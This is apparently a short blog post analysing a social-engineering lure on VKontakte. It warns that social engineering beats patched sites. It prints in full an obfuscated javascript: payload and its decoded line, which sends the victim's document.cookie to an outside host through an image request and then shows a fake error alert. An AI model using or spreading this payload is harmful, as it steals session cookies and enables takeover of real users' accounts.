12:51 Even with the holes closed in "VKontakte", you can still do an XSS
The other day I was invited to add a certain VKontakte application. My interest was piqued, so I went to take a look. Here is what I saw: the string is long, so it does not fit in the application's input field. I will give it in full:

    javascript:page=String.fromCharCode(105,109,103,61,110,101,119,32,73,109,97,103,101,40,41,59,105,109,103,46,115,114,99,61,39,104,116,116,112,58,47,47,118,112,111,112,107,117,46,111,114,103,47,115,117,112,47,115,46,112,104,112,63,113,61,39,43,100,111,99,117,109,101,110,116,46,99,111,111,107,105,101,59);eval(page);alert(unescape("%u041D%u0435%20%u0443%u0434%u0430%u0435%u0442%u0441%u044F%20%u0432%u044B%u043F%u043E%u043B%u043D%u0438%u0442%u044C%20%u0434%u0435%u0439%u0441%u0442%u0432%u0438%u0435%21"))

All fairly trivial: first it runs a script that sends the cookie to the haters:

    img = new Image(); img.src = 'http://vpopku.org/sup/s.php?q=' + document.cookie;

And then it shows the user an alert with the message: "Unable to perform action!"

Seeing that, the user, though angry, suspects nothing and closes the application.

So I want to say again that even if you close all the security holes in web sites, the most effective method of all time will always remain: social engineering.

P.S. This is my first encounter with this particular exercise in social engineering and XSS. If this is a repeat, excuse me.